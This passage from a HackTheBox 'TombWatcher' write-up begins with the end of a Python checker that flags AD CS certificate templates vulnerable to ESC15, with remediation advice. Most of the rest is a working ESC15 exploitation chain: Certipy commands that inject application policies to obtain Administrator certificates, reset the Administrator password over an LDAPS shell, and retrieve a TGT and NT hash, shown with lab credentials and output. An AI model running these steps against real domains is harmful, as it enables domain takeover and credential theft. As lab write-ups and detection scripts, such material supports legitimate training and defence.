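    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):               # column 0: section header
            section, current, last_key = line.strip(), None, None
            continue
        if section != "Certificate Templates":
            continue
        if ENTRY.match(line):
            current, last_key = {}, None
            templates.append(current)
            continue
        if current is None:
            continue
        indent = len(line) - len(line.lstrip(" "))
        m = KEY_VALUE.match(line)
        if m:
            last_key, key_indent = m.group(2), indent
            current[last_key] = [m.group(3).strip()]
        elif last_key and indent > key_indent:     # continuation of a multi-valued field
            current[last_key].append(line.strip())
        else:                                      # sub-header such as 'Permissions'
            last_key = None
    return templates


def field(template, key, default=""):
    return template.get(key, [default])[0]


def esc15_findings(templates):
    """Report enabled V1 templates with enrollee-supplied subject, no manager approval
    or co-signature, and an enrollment principal outside the admin groups. On a CA
    without the CVE-2024-49019 patch this is the ESC15 precondition from the report."""
    findings = []
    for t in templates:
        if field(t, "Enabled") != "True" or field(t, "Schema Version") != "1":
            continue
        if field(t, "Enrollee Supplies Subject") != "True":
            continue
        if field(t, "Requires Manager Approval") == "True":
            continue
        if field(t, "Authorized Signatures Required", "0") != "0":
            continue
        enrollers = [p for p in t.get("Enrollment Rights", [])
                     if not p.endswith(ADMIN_GROUPS)]
        if enrollers:
            findings.append({"template": field(t, "Template Name"),
                             "enrollable_by": enrollers})
    return findings


if __name__ == "__main__":
    for f in esc15_findings(parse_certipy_report(SAMPLE_REPORT)):
        print(f"[ESC15] {f['template']}: enrollable by {', '.join(f['enrollable_by'])}")
```

The same checks can be fed from the JSON file Certipy writes alongside the text report. In the page's own terms the fix is to apply the CVE-2024-49019 patch and, for V1 templates that must keep EnrolleeSuppliesSubject, to require manager approval or to restrict enrollment rights to the administrative groups; either change makes the template drop out of the findings above.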

ESC15

Plan A

Step 1: Request a certificate, injecting “Client Authentication” Application Policy and target UPN

certipy req \
    -u 'cert_admin@tombwatcher.htb' -p 'Abc123456@' \
    -dc-ip '10.10.11.72' -target 'DC01.tombwatcher.htb' \
    -ca 'tombwatcher-CA-1' -template 'WebServer' \
    -upn 'administrator@tombwatcher.htb'  \
    -application-policies 'Client Authentication'

Step 2: Authenticate via Schannel (LDAPS) using the obtained certificate.

[root@kali] /home/kali/TombWatcher  
❯ certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72' -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@tombwatcher.htb'
[*] Connecting to 'ldaps://10.10.11.72:636'
[*] Authenticated to '10.10.11.72' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands

# change_password administrator Abc123456@
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: Abc123456@
Password changed successfully!

After that you can log in.

Plan B

Step 1: Request a certificate from a V1 template (with “Enrollee supplies subject”), injecting “Certificate Request Agent” Application Policy.

certipy req \
    -u 'cert_admin@tombwatcher.htb' -p 'Abc123456@' \
    -dc-ip '10.10.11.72' -target 'DC01.tombwatcher.htb' \
    -ca 'tombwatcher-CA-1' -template 'WebServer' \
    -application-policies 'Certificate Request Agent'

Step 2: Use the “agent” certificate to request a certificate on behalf of a target privileged user.

certipy req \
    -u 'cert_admin@tombwatcher.htb' -p 'Abc123456@' \
    -dc-ip '10.10.11.72' -target 'DC01.tombwatcher.htb' \
    -ca 'tombwatcher-CA-1' -template 'User' \
    -pfx 'cert_admin.pfx' -on-behalf-of 'tombwatcher\Administrator'

Step 3: Authenticate as the privileged user using the “on-behalf-of” certificate.

[root@kali] /home/kali/TombWatcher  
❯ certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrator@tombwatcher.htb'
[*]     Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:<hidden>

Summary

Overall a fairly routine box; the chain is just a little long.
